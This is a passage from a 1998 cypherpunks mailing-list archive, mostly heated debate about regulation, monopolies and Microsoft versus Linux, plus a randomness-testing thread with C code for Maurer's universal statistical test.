The reason the federal is broken into 3 seperate sections is so that  there
is a measure of conflict and confrontation involved. *THE* basis for a
working democracy is the limited use of cooperation.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stu Green <stugreen@realtime.net>
Date: Sun, 4 Oct 1998 11:17:43 +0800
To: alg <cypherpunks@einstein.ssz.com
Subject: Court considers cooking cookies' book - THE REGISTER
Message-ID: <3617A0DE.7B0C74DC@realtime.net>
MIME-Version: 1.0
Content-Type: text/plain






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 4 Oct 1998 13:58:21 +0800
To: Matthew James Gering <cypherpunks@cyberpass.net>
Subject: RE: GPL & commercial software, the critical distinction (fwd)
In-Reply-To: <33CCFE438B9DD01192E800A024C84A1928471D@mossbay.chaffeyhomes.com>
Message-ID: <4.0.2.19981004113522.00b24be0@shell11.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain



    --
At 12:30 AM 10/1/98 -0700, Matthew James Gering wrote:
> Regulation includes much more than licensing and
> registration. Try hiring a couple employees, paying
> freelance individuals, setup office space, get yourself a
> company car and do your fed income taxes. Lightly regulated
> my ass. If they enforced every word of every code strongly
> and literally it would be nearly impossible to conduct
> business.

To the best of my observation, every single small business is
operating illegally. The situation differs from Russia only
in degree, not in kind

    --digsig
         James A. Donald
     6YeGpsZR+nOTh/cGwvITnSR3TdzclVpR0+pr3YYQdkG
     ijgrm6mPtp+ITpiypBMGLzXsIs6lHQrzIqUz4YVV
     43IJ5kE5GhIslIQSgCTgRQZID2XvL+MfwFf/uPGD8
-----------------------------------------------------
We have the right to defend ourselves and our property, because 
of the kind of animals that we are. True law derives from this 
right, not from the arbitrary power of the omnipotent state.


http://www.jim.com/jamesd/      James A. Donald




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 4 Oct 1998 13:59:46 +0800
To: Jim Choate <cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: I thought of an initialy regulated industry!...
In-Reply-To: <199810011243.HAA18113@einstein.ssz.com>
Message-ID: <4.0.2.19981004113817.00ba5100@shell11.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain



At 07:43 AM 10/1/98 -0500, Jim Choate wrote:
> Personaly, 3 Mile Island in a un-regulated industry scares
> the hell out of me...and I support nuclear power. Look at
> the fiasco of Chernobyl in a control market.

Observe that the level of harm is approximately proportional
to the level of government regulation.

You presuppose that government officials will be more
virtuous than private individuals.  This is obviously
unlikely, since they have less reason to fear retribution
than private individuals.

    --digsig
         James A. Donald
     6YeGpsZR+nOTh/cGwvITnSR3TdzclVpR0+pr3YYQdkG
     KbuqgbXneCGpwCkzD74HaiFd/J5YwQM2KIGMZj5R
     4MnABV61Fum7fXVJ9y0SGutgtOy0PncqHqIN0Mlc9
-----------------------------------------------------
We have the right to defend ourselves and our property, because 
of the kind of animals that we are. True law derives from this 
right, not from the arbitrary power of the omnipotent state.


http://www.jim.com/jamesd/      James A. Donald




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 4 Oct 1998 14:41:35 +0800
To: "Brown, R Ken" <petro@playboy.com>
Subject: RE: GPL & commercial software, the critical distinction (fwd)
In-Reply-To: <896C7C3540C3D111AB9F00805FA78CE2013F8476@MSX11002>
Message-ID: <199810041939.MAA12936@proxy3.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain



    --
At 05:28 AM 10/2/98 -0500, Brown, R Ken wrote:
> Nonsense. Most of those businesses became monopolies - or
> local monopolies - in the relatively unregulated 1880-1914
> period. 

Untrue:

> In some of them - like rail or oil in the USA - governments
> introduced regulation to *force* competition. 

In the case of the railways, the governments granted and
imposed monopolies.  In the case of oil, I assume you are
referring to "Standard Oil", there was no monopoly, and the
government regulation had little apparent effect. 

Also the Standard Oil issue was about refineries, not oil
wells or oil pipelines.  There was nothing to prevent any man
or his dog from setting up a refinery, and lots of them did.

> In UK over the last 30 years government  has  used a thing 
> called the "Monopolies and Mergers Commission" to
> investigate & (very occasionally) break up monopolies or
> cartels. 

This is like arguing that the existence of witch burning
proves the existence of witches.

> Recently government has forcibly broken up gas supply
> monopolies in this country.  

After first forcibly creating gas supply monopolies.

> What happens much more often is that one company becomes
> dominant and then uses money to undersell rivals.

Why don't you argue that they conduct sacrifices to Satan?

A big company has no monetary advantage over a small company.

Suppose Firm A controls 90% of the market and firm B controls
10% of the market.  Artificially low prices cost the big firm
nine times as much as the small firm.  Under capitalism, the
small company can duke it out on equal terms with the big
firm, and with great regularity, that is exactly what they
do.

> Garbage (what we call rubbish over here) collection  is
> different again. It's not at all a nutural monopoly and
> there is nothing stopping anyone offering to do it as a
> business. But it is a natural for social ownership,

You mistake the political adventures of your local elite for
universal laws.  In some parts of the world rubbish
collection is private.  In other parts of the world shoe
production is public.

In one of those nordic countries, I think Finland, the phone
system was never made a public enterprise or state regulated
monopoly, but most other things were.

There is no "natural monopoly" that is not somewhere a
private industry, and often it is a private industry in a
place that is otherwise quite socialist.  Public and private
ownership reflect the accidents of politics and history more
than they reflect the natural characteristics of the industry
in dispute.

    --digsig
         James A. Donald
     6YeGpsZR+nOTh/cGwvITnSR3TdzclVpR0+pr3YYQdkG
     UGkX+1b/yoE+3kHZyOhKZypmXTbwJRhUnQQmuuXZ
     4wYCfh8Ku6v+DiuN6q6haMUHpW8UcDrlkVLmN20j8
-----------------------------------------------------
We have the right to defend ourselves and our property, because 
of the kind of animals that we are. True law derives from this 
right, not from the arbitrary power of the omnipotent state.


http://www.jim.com/jamesd/      James A. Donald




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 4 Oct 1998 14:40:55 +0800
To: Jim Choate <cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: I thought of an initialy regulated industry!... (fwd)
In-Reply-To: <199810021246.HAA24653@einstein.ssz.com>
Message-ID: <199810041939.MAA13220@proxy3.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain



At 07:46 AM 10/2/98 -0500, Jim Choate wrote:
> The largest environment impact issue with a nuclear plant
> is hot water discharge (which is much larger than the
> exhaust from a coal plant) 

Since the operating temperature of the steam of a typical
nuclear reactor is only a little lower than the operating
temperature of the steam of a coal fired plant, the hot water
discharge is necessarily about the same for the same amount
of power generated.  For a nuclear plant to discharge much
more hot water than a coal plant, it would have to have much
lower thermal efficiency, which is not the case.

> and spent fuel storage because of the amount of time that
> is required to guarantee seals.

High level nuclear waste should be kept isolated for five
hundred years.  Since there are plenty of buildings, mostly
fortresses and monuments, that have survived for a good deal
longer than five hundred years, this does not seem terribly
difficult.

> The issue with storage is that it occurs on a time line
> that is best described as near-geologic. Periods of time
> that are orders of magnitude longer than human
> civilizations survive.

Bunkum:  The contaminant that lasts geological ages is
plutonium, and the arsenic dumped by a coal plant constitutes
far more lethal doses than the plutonium dumped by a nuclear
power plant.

> Consider the difference in volume of these two waste
> products...

So dilution is an acceptable solution for the poison in fly
ash, but it is a big problem for the plutonium in radioactive
waste?

If dilution is acceptable, let us dump our waste in the cold
salty current coming off the arctic icecap, as the russians
are doing.  It will be a thousand years before that stuff
comes back to the surface, and by that time only the
plutonium will be a problem.

    --digsig
         James A. Donald
     6YeGpsZR+nOTh/cGwvITnSR3TdzclVpR0+pr3YYQdkG
     hVZVbJPCiyR27Tdf+qFl+uj9Hc2KWiql5J1jnKJf
     4lXDcc7tAkwo7qEp0ZXbXv7XJqHc7d2LpmbS0UlzA
-----------------------------------------------------
We have the right to defend ourselves and our property, because 
of the kind of animals that we are. True law derives from this 
right, not from the arbitrary power of the omnipotent state.


http://www.jim.com/jamesd/      James A. Donald




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 4 Oct 1998 15:06:40 +0800
To: Jim Choate <cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: GPL & commercial software, the critical distinction (fwd)
In-Reply-To: <199810041331.IAA30976@einstein.ssz.com>
Message-ID: <4.0.2.19981004123048.00bc57b0@shell11.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain



At 08:31 AM 10/4/98 -0500, Jim Choate wrote:
> Malarky. Reputation is irrelevant, just examine the
> prisoners delima.

Yet strange to report, the banks have no problem with granting me many tens
of thousands of dollars of unsecured credit.

Perhaps your reputation is irrelevant.  Mine, however, is obviously relevant.

> Those who put reputation over action are setting themselves up for a classic
> abuse of trust.

My former employer Informix had probably a million dollars of small,
readily fencible stuff such as memory chips in the computers of the many
large buildings to which I and about six hundred other employees had access
at any hour of the day or night.  They appeared to me to have a policy not
employing males straight out of college, but rather hiring people who had
some established background but apart from that took no special
precautions.  In particular they did not have a night watchman wandering
about at random.  Their watchman sat at the door or patrolled the exterior,
oriented solely on external threats.
 
The continued solvency of Informix, rental car agencies, and so on and so
forth looks indicates it is possible to readily distinguish between those
who will defect in a game of prisoners dilemma, and those who will cooperate.

    --digsig
         James A. Donald
     6YeGpsZR+nOTh/cGwvITnSR3TdzclVpR0+pr3YYQdkG
     290NudELAtcM3PNN1SqalY8d8gN9gJ4SQcm4vqLY
     4U3vo+UqobR2nocMv+YQS7rqA47Y6ULXH+H1AAXVp
-----------------------------------------------------
We have the right to defend ourselves and our property, because 
of the kind of animals that we are. True law derives from this 
right, not from the arbitrary power of the omnipotent state.


http://www.jim.com/jamesd/      James A. Donald




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjm@spe.com
Date: Sun, 4 Oct 1998 12:13:11 +0800
To: cypherpunks@cyberpass.net
Subject: RE: GPL & commercial software, the critical distinction (fwd)
In-Reply-To: <33CCFE438B9DD01192E800A024C84A19284710@mossbay.chaffeyhomes.com>
Message-ID: <1704-Sun04Oct1998124154+0200-pjm@spe.com>
MIME-Version: 1.0
Content-Type: text/plain



Petro writes:
[ . . . ]
 > 	Aren't there certain departments/divisions in the governement that
 > only accept electronic files if they are in "word" format? (i.e. the DoD,
 > but I don't have a site for that, so I could be mistaken).
 > 
 > 	I know that I've never seen a Military Computer (desktop kind) that
 > wasn't a Wintel/Dos machjne (talking general purpose computer here, not a
 > targeting machine etc.)
 > 
 > 	Sell a couple hundered thousand units to the Feds, and that is a
 > considerable dent in the "level playing field" of the free market.

     Check the archives!  (I really enjoyed typing that.)  A few
months ago in a thread initiated by, I believe, Dr. Hun, I suggested
that the best way for the government to break the alleged Microsoft
monopoly would be to stop buying their products.

     Given that free alternatives are available, our tax dollars
shouldn't be wasted on expensive software.  The fact that the free
software is technically superior is icing on the cake.

Regards,

pjm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 4 Oct 1998 15:06:34 +0800
To: Jim Choate <cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: GPL & commercial software, the critical distinction (fwd)
In-Reply-To: <199810041334.IAA31037@einstein.ssz.com>
Message-ID: <4.0.2.19981004123601.00bd4d00@shell11.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain



> > No monopoly has ever happened except by regulation

At 08:34 AM 10/4/98 -0500, Jim Choate wrote:
> Microsoft got to where it is because of a lack of
> regulation, 

Microsoft is not a monopoly.  In servers, where much of their
income comes from, Linux is eating their lunch, and the
desktop is under continual threat.  For a monopoly to be a
monopoly, you not only have to have most of the market, you
have to have some means of excluding others, which Microsoft
manifestly does not.

> the abuses of the aircraft industry  in the 1940-50's that
> led to regulation at the end of the 50's and 60's. The
> steel industry in the north east in the early 1900's. The
> food packing and garment industries of the north east and
> pacific coast in the 20's through the 50's. The railroad
> industry in the mid-1800's.

You are totally deluded.  None of these are examples of
monopoly, except for the railroad industry where government
intervention was for the purpose of creating monopoly, not
preventing it.

The garment and food packing industries were and are a huge
network of innumerable tiny shops, and the aircraft industry
had several big companies in fierce competition. 

    --digsig
         James A. Donald
     6YeGpsZR+nOTh/cGwvITnSR3TdzclVpR0+pr3YYQdkG
     tGwDPXVCokaVVyVk0h0Eg2GWnP+PvoDN/FVnNlrj
     4rpwXX94bGxwVRYaTkgfjolUcS6JYdmdeC7V3gPK3
-----------------------------------------------------
We have the right to defend ourselves and our property, because 
of the kind of animals that we are. True law derives from this 
right, not from the arbitrary power of the omnipotent state.


http://www.jim.com/jamesd/      James A. Donald




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 4 Oct 1998 15:06:33 +0800
To: Jim Choate <cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: GPL & commercial software, the critical distinction (fwd)
In-Reply-To: <199810041405.JAA31171@einstein.ssz.com>
Message-ID: <4.0.2.19981004124328.00a7a100@shell11.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain



> > In america the various mafias get plently of competition, 
> > mostly by means short of actual warfare.  Coke is a free 
> > market except for police intervention, and the local
> > church is most certainly not a monopoly.

At 09:05 AM 10/4/98 -0500, Jim Choate wrote:
> Coke is a free-market? That's a laugh. I suggest you study
> the history of the Crips and related gangs, or the
> international Coke distributors.

Except for police intervention, anyone is free to buy coke
from dealers affiliated with the Crips, affiliated with the
Bloods, or affiliated with any one of several smaller
providers of such services.

Generally competition between these groups mostly resembles
the competition between Visa and Mastercard with shoot outs
being the exception rather than the rule.  Shootouts are bad
for business. 

    --digsig
         James A. Donald
     6YeGpsZR+nOTh/cGwvITnSR3TdzclVpR0+pr3YYQdkG
     Z3KdZnJI+f5vF118VFL0MXvnc/vax1L5aOSwtuLC
     4wEeXVOQ8uu5x6lqxMjR/dzZelSR7LUosYe37IJQM
-----------------------------------------------------
We have the right to defend ourselves and our property, because 
of the kind of animals that we are. True law derives from this 
right, not from the arbitrary power of the omnipotent state.


http://www.jim.com/jamesd/      James A. Donald




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>"James A. Donald" <jamesd@echeque.com>
Date: Sun, 4 Oct 1998 15:06:48 +0800
To: Jim Choate <cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: GPL & commercial software, the critical distinction (fwd)
In-Reply-To: <199810041408.JAA31231@einstein.ssz.com>
Message-ID: <4.0.2.19981004124919.00bd6db0@shell11.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain



> > the local church is most certainly not a monopoly.

At 09:08 AM 10/4/98 -0500, Jim Choate wrote:
> Your local church is a member of a larger international 
> collective that does in fact use coercion in one form or
> another.

Send me some of whatever you are smoking.

    --digsig
         James A. Donald
     6YeGpsZR+nOTh/cGwvITnSR3TdzclVpR0+pr3YYQdkG
     s9ZGIU5475XTNx5ONJvcatdWP8o+0shicf5WCTZR
     4vZx1tKCacPwbutEfIcGHgS3Wh0Jg79kjdKlVk5YB
-----------------------------------------------------
We have the right to defend ourselves and our property, because 
of the kind of animals that we are. True law derives from this 
right, not from the arbitrary power of the omnipotent state.


http://www.jim.com/jamesd/      James A. Donald




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Gering <mgering@ecosystems.net>
Date: Sun, 4 Oct 1998 15:16:37 +0800
To: "Cypherpunks (E-mail)" <cypherpunks@cyberpass.net>
Subject: RE: GPL & commercial software, the critical distinction (fwd)
Message-ID: <33CCFE438B9DD01192E800A024C84A193A7A10@mossbay.chaffeyhomes.com>
MIME-Version: 1.0
Content-Type: text/plain




> Microsoft got to where it is because of a lack of regulation

Microsoft is not a monopoly by any stretch of the imagination.

> The railroad industry in the mid-1800's.

Railroads were highly competitive in the East. The railroad monopolies
in the West were created by exclusive government land grants.

	Matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@sprynet.com>
Date: Sun, 4 Oct 1998 16:09:19 +0800
To: Clifford Heath <cypherpunks-unedited@toad.com
Subject: Re: Randomness testing
In-Reply-To: <m0zOxtY-0001eoC@magpie.osa.com.au>
Message-ID: <3.0.5.32.19981004135242.00882410@m7.sprynet.com>
MIME-Version: 1.0
Content-Type: text/plain



At 03:36 PM 10/2/98 +1000, Clifford Heath wrote:
>We have been asked by a customer if we have any tests that demonstrate 
>the randomness of the SSLeay random number generator (augmented by some
>sound-card random number seeding that we wrote).
>
>I'd like to find some standard implementation for testing randomness, but 
>Schneier offers no help (other than a reference to Knuth Vol 2), and I
>don't know where else to turn.
>
>I realise that cryptographic randomness requires unpredictability, and
>this quality depends upon closed-world assumptions about unknown individuals'
>predictive powers, but we have to live with that.

* Marsaglia's DIEHARD suite, also see DIEHARDC
* I posted code for Maurer's Universal statistical test a week or so
ago; I find this discriminates between a cipher output and real noise...
* Find the RAND corp paper on random numbers 
* See FIPS 140










  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@sprynet.com>
Date: Sun, 4 Oct 1998 16:09:42 +0800
To: Mok-Kong Shen <cjh@osa.com.au>
Subject: Re: Randomness testing
In-Reply-To: <m0zOxtY-0001eoC@magpie.osa.com.au>
Message-ID: <3.0.5.32.19981004135551.00888630@m7.sprynet.com>
MIME-Version: 1.0
Content-Type: text/plain



At 11:13 AM 10/2/98 +0100, Mok-Kong Shen wrote:
>Clifford Heath wrote:
>> 
>I suggest that you do at least Maurer's test which is described
>in A. J. Menezes et al. Handbook of Applied Cryptography. The
>test is not difficult to code. You could also look at my code in
>http://www.stud.uni-muenchen.de/~mok-kong.shen/#paper1 in Fortran.
>
>M. K. Shen
>



/*
UELI.c

1 Oct 98

This implements Ueli M Maurer's
"Universal Statistical Test for Random Bit Generators"
using L=16

Accepts a filename on the command line;
writes its results, with other info, to stdout.

Handles input file exhaustion gracefully.

Ref: J. Cryptology v 5 no 2, 1992 pp 89-105
also on the web somewhere, which is where I found it.

-David Honig
honig@sprynet.com


Built with Wedit 2.3, lcc-win32
http://www.cs.virginia.edu/~lcc-win32


26 Sept CP Release
Version Notes:

	This version does L=16.  It evolved from an L=8 prototype
	which I ported from the Pascal in the above reference.

	I made the memory usage reasonable
	by replacing Maurer's "block" array
	with the 'streaming' fgetc() call.


Usage:
	UELI filename
	outputs to stdout

*/

#define L 16		// bits per block
#define V (1<<L)	// number of possible blocks
#define Q (10*V)    // at LEAST 10 * V, to assure each block seen
#define K (100*Q)   // at LEAST 100 * Q, as large as possible
#define MAXSAMP (Q + K)

#include <stdio.h>
#include <math.h>


int main( int argc, char **argv )
{
FILE *fptr;
int i;
int b, c;
int table[V];
float sum=0.0;
int run;

// Human Interface
printf("UELI 26 Sep 98\nL=%d %d %d \n", L, V, MAXSAMP);
if (argc <2)
	{printf("Usage: UELI filename\n"); exit(-1); }
else
	printf("Measuring file %s\n", argv[1]);

// FILE IO
fptr=fopen(argv[1],"rb");
if (fptr == NULL) {printf("Can't find %s\n", argv[1]); exit(-1); }

// INIT
for (i=0; i<V; i++) table[i]=0;
for (i=0; i<Q; i++)	{
	b= fgetc(fptr)<<8 | fgetc(fptr);
	table[ b ]=i;
}

printf("Init done\n");

// COMPUTE
run=1;
for (i=Q;  run && i<Q+K; i++)
	{
	// COMPOSE A 16-bit quantity
	b=fgetc(fptr); if (b<0) run=0;
	c=fgetc(fptr); if (c<0) run=0;
	if (run) { b = b<<8 | c;
			sum += log( (double) ( i-table[b] ) ) ;
			table[ b ]=i;
		}
	}

	if (!run) printf("Premature end of file; read %d blocks.\n", i-Q);
	sum = (sum/( (double) (i-Q) ) ) /  log(2.0);    // i should be K if enough
samples
	printf("%s fTU= %f\n\n", argv[1], sum);
	printf("Expected value for L=16 is 15.167379 \n");

	// Add further interpretation/thresholding of the number of sigmas from
expected,
	// and include the fudge factors explained in the paper.




} // end











  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@sprynet.com>
Date: Sun, 4 Oct 1998 16:11:47 +0800
To: Jim Choate <cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: 2 books of potential interest...
In-Reply-To: <199810031725.MAA28225@einstein.ssz.com>
Message-ID: <3.0.5.32.19981004141215.0088c9f0@m7.sprynet.com>
MIME-Version: 1.0
Content-Type: text/plain



At 12:25 PM 10/3/98 -0500, Jim Choate wrote:
>Hello,
>
>I was in Bookstop a while ago and noticed two books that could be of
>potential interest.

Let me recommend: "Eat the Rich" by PJ O'rourke.  Humorous introduction
to meaning of money, generation of wealth, laissez-fair, and his
experiences in
Cuba, Sweden, Albania, Tanzania learning about these.

An easy read, possibly of interest for neophytes interested in why
we have no ecash (or quantized bananas).  (Neither are answered).










  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 4 Oct 1998 16:56:09 +0800
To: Jim Choate <cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: GPL & commercial software, the critical distinction (fwd)
In-Reply-To: <199810042024.PAA32554@einstein.ssz.com>
Message-ID: <199810042156.OAA18581@proxy3.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain



>> Microsoft is not a monopoly.  [...]  Linux is eating their
>> lunch,

At 03:24 PM 10/4/98 -0500, Jim Choate wrote:
> It is certainly growing but the fact is that by a factor of
> orders of magnitude commercial Unix'es own that market.
> When it comes to mission critical servers Solaris, HP, &
> AIX own the market still.

The number one server is not Microsoft, and is not
commercial.

And if it was commercial, Microsoft would still be being
eaten alive in the server market.  They still have their
lunch in the end user market, but the wolves are eyeing that
also.

> In the aircraft industry for example, while the number of
> riders was growing very quickly there was a concommitent
> increase in end-user ticket prices that was way out of line
> with the increased cost of business operations as well as
> [...]

When you make up facts it is customary to invent names,
places, and dates in order to give the appearance of
verisimilitude.

    --digsig
         James A. Donald
     6YeGpsZR+nOTh/cGwvITnSR3TdzclVpR0+pr3YYQdkG
     37RmYMVajW0Tw1f5iy1gJUreAXMZoIsD71kbTgi2
     4A/lXSKOHk7Ru9/A6+FhVDSgj9sBgAyDS57+IF402

-----------------------------------------------------
We have the right to defend ourselves and our property, because 
of the kind of animals that we are. True law derives from this 
right, not from the arbitrary power of the omnipotent state.


http://www.jim.com/jamesd/      James A. Donald




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 4 Oct 1998 16:57:31 +0800
To: Jim Choate <cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: GPL & commercial software, the critical distinction (fwd)
In-Reply-To: <199810042051.PAA32751@einstein.ssz.com>
Message-ID: <199810042156.OAA18583@proxy3.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate claims that free markets are routinely overrun by
monopolies.  I say this is nonsense.

At 03:51 PM 10/4/98 -0500, Jim Choate wrote:
> But I'd certaily entertain any evidence you may want to 
> present to your case.

How can anyone present evidence when except for Microsoft you
have not named a single company that alleged became a
monopoly, and you have been vague about the markets that
these companies allegedly monopolized, and the periods during
which these markets were monpolized.

It is as if you were claiming that giant monsters frequently
terrorized US cities.  Unless you make a specific allegation,
no refutation is possible or necessary.

For example if you were to claim that King Kong demolished
the empire state building, then someone could point out that
the empire state building still stands.

A simple explanation for your inability to name any specific
giant monsters, or any particular places and times where
these giant monsters were rampaging, is that these giant
monsters do not exist, and never have existed.

> Examples please where a small firm dukes it out (sic) on
> equal terms with a larger one...

MacDonalds vs Burger King.  Hertz vs Avis.  Mastercard vs
Visa.

And of course, the biggest mismatch of them all 

Microsoft vs Linux.

> > You mistake the political adventures of your local elite
> > for universal laws.

> What country produces shoes as a function of government
> agency and prevents private shoe production? 
>
> I must admit I nearly hurt myself laughing at this one.

Holland used to do this on the grounds that shoes were a
vital necessity, and if the market was left to private
enterprise some people would go shoeless.

> A 'natural' monoploy, to my mind, is a company that
> operates in an industry that can be saturated. By
> saturation I mean that the demand of the market can be met
> by a small number (approaching 1 if left unregulated over
> time, usualy by by-outs or business experation) of
> manufacturers.

There is no empirical evidence that any natural monopolies
exist.

> The VCR industry is a great example of a 'natural'
> monopoly. Only a few years ago *every* VCR mechanism on the
> planet was made by one of 5 companies and with the
> cessation of Curtis-Williams, not one of them was a US
> company. 

This does not make the VCR business a monopoly.  It would
only be a monopoly if the existing players were free to raise
prices.  Manifestly the market for the mechanism of the VCR
has become a commodity market, in which profit margins are
extremely low.

The same is true of the aluminium market, where you have all
aluminium smelted by a single provider.  There is nothing to
stop anyone else from going into the business, but because
the profit margins are razor thin, nobody bothers.  Although
there is only a single company, it is not a monopoly because
if they expanded their very thin proft margins by the
slightest degree, other people would promptly eat their
lunch. 

    --digsig
         James A. Donald
     6YeGpsZR+nOTh/cGwvITnSR3TdzclVpR0+pr3YYQdkG
     oa82+HWPHe6y441fIArVLbuu3EwwEh2ZOS4Pi3jk
     4Lscjd2dJEP8tQjtxX0+5pcrFhvS7G3mJz67hoycC
-----------------------------------------------------
We have the right to defend ourselves and our property, because 
of the kind of animals that we are. True law derives from this 
right, not from the arbitrary power of the omnipotent state.


http://www.jim.com/jamesd/      James A. Donald




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Sun, 4 Oct 1998 15:06:15 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: GPL & commercial software, the critical distinction (fwd)
Message-ID: <199810042010.PAA32089@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Sun, 04 Oct 1998 11:37:23 -0700
> From: "James A. Donald" <jamesd@echeque.com>
> Subject: RE: GPL & commercial software, the critical distinction (fwd)

> At 12:30 AM 10/1/98 -0700, Matthew James Gering wrote:
> > Regulation includes much more than licensing and
> > registration. Try hiring a couple employees, paying
> > freelance individuals, setup office space, get yourself a
> > company car and do your fed income taxes. Lightly regulated
> > my ass. If they enforced every word of every code strongly
> > and literally it would be nearly impossible to conduct
> > business.
> 
> To the best of my observation, every single small business is
> operating illegally. The situation differs from Russia only
> in degree, not in kind

Prove it. List he specific rules, regulations, etc. that you believe every
small business is breaking....

Put up or shut up.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Sun, 4 Oct 1998 15:08:37 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: GPL & commercial software, the critical distinction (fwd)
Message-ID: <199810042013.PAA32334@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Sun, 04 Oct 1998 12:50:50 -0700
> From: "James A. Donald" <jamesd@echeque.com>
> Subject: RE: GPL & commercial software, the critical distinction (fwd)

> At 09:08 AM 10/4/98 -0500, Jim Choate wrote:
> > Your local church is a member of a larger international=20
> > collective that does in fact use coercion in one form or
> > another.
> 
> Send me some of whatever you are smoking.

That's the best you can come up with?

Sheesh.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Sun, 4 Oct 1998 15:09:57 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: GPL & commercial software, the critical distinction (fwd)
Message-ID: <199810042014.PAA32418@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Sun, 04 Oct 1998 12:48:50 -0700
> From: "James A. Donald" <jamesd@echeque.com>
> Subject: RE: GPL & commercial software, the critical distinction (fwd)

> Except for police intervention, anyone is free to buy coke
> from dealers affiliated with the Crips, affiliated with the
> Bloods, or affiliated with any one of several smaller
> providers of such services.

Really? I dare you to wear the colors of a Crip and then sell in the Bloods
neighborhood.

> Generally competition between these groups mostly resembles
> the competition between Visa and Mastercard with shoot outs
> being the exception rather than the rule.  Shootouts are bad
> for business.=20

Somebody should tell them this then since they certainly don't operate that
way in the real world.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard Stallman <rms@santafe.edu>
Date: Sun, 4 Oct 1998 16:25:06 +0800
To: nobody@replay.com
Subject: No Subject
In-Reply-To: <199810010100.DAA26700@replay.com>
Message-ID: <199810042123.PAA06233@wijiji.santafe.edu>
MIME-Version: 1.0
Content-Type: text/plain



    The GNU GPL discourages the sale of proprietary software by prohibiting
